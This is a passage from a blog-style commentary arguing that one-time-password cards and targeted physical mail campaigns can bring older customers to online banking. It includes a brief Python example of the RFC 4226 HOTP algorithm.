In my mind, the first two key elements above can be addressed via the new technology available in the form of a one-time-password-generating card form factor. Traditionally, tokens have offered this functionality, but let's face it, these would appear as a foreign object to most of the older consumer generation. Cards, on the contrary, have been in widespread use for decades (e.g. pensioner cards, Medicare cards, driver's licences, credit/debit cards). Most importantly, the card form factor generates the OTP code on demand, thereby offering the simplest two-factor authentication experience. This is in stark contrast to out-of-band alternatives such as SMS, where network delays in delivering the access passcode (which in the worst case never arrives) can lead to a very disconcerting experience for anyone, let alone the older consumer generation.
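
For the curious, the code such a card displays can be generated completely offline; the HOTP algorithm from RFC 4226 is one way to do it (the secret below is made up; a real card keeps its secret in hardware and shares it with the bank at issue time):

    # RFC 4226 HOTP: HMAC-SHA1 over a counter, dynamically truncated.
    import hashlib
    import hmac
    import struct

    def hotp(secret, counter, digits=6):
        mac = hmac.new(secret, struct.pack(">Q", counter),
                       hashlib.sha1).digest()
        offset = mac[-1] & 0x0F
        code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    # Card and bank share the secret and a counter that advances on
    # every button press; both sides compute the same 6-digit code.
    print(hotp(b"hypothetical-shared-secret", 1))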




This leaves us with the last key element for success, which involves a targeted marketing campaign. Clearly, any campaign intended to draw consumers into the online realm needs to commence in the physical realm. One option here is a physical mail-out campaign: a flyer that illustrates and describes the security benefits of an OTP card would offer an excellent draw card to the online medium.


To conclude, I don't believe banks should be abandoning any ambitions to drive the older consumer generation towards the online banking medium. Let's not write them off just yet. I belong to that consumer segment; I'm actually 45!
